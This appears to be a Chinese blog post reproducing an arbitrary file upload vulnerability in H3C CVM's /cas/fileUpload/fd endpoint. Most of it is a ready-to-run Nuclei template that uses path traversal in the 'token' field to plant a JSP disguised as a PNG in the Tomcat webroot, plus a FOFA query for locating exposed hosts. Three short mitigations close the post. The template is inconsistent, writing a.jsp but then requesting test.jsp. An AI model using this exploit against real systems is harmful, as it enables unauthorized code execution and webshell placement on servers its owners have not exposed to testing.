H3C-CVM前台fd接口处存在任意文件上传漏洞【漏洞复现|附nuclei-POC】

01—Nuclei POC

id: H3C-CVM-fd-fileupload

info:
  name: H3C-CVM-fd接口前台任意文件上传漏洞
  author: J
  severity: high
  metadata:
    fofa-query: app="H3C-CVM"

http:
  - raw:
      - |
        POST /cas/fileUpload/fd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.123 Safari/537.36
        Connection: close
        Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4
        Connection: close

        --WebKitFormBoundaryMMqEBbEFHlzOcYq4
        Content-Disposition: form-data; name="token"

        /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp
        --WebKitFormBoundaryMMqEBbEFHlzOcYq4
        Content-Disposition: form-data; name="file"; filename="test.jsp"
        Content-Type: image/png

        <%out.println("test");%>
        --WebKitFormBoundaryMMqEBbEFHlzOcYq4--

      - |
        GET /cas/js/lib/buttons/test.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
              - 'status_code_1 == 200'
              - 'status_code_2 == 200'
              - 'contains(body_2,"test")'
        condition: and

FOFA：app="H3C-CVM"

界面如下

漏洞检测POC

1、文件类型验证：仅允许上传特定类型的文件，例如图像、文档等，并拒绝可执行文件或其他潜在的恶意文件类型。

2、文件大小限制：限制上传文件的大小，以防止恶意用户上传过大的文件导致服务器资源耗尽。

3、文件名处理：对上传的文件进行重命名，避免使用用户提供的文件名，以防止路径遍历攻击。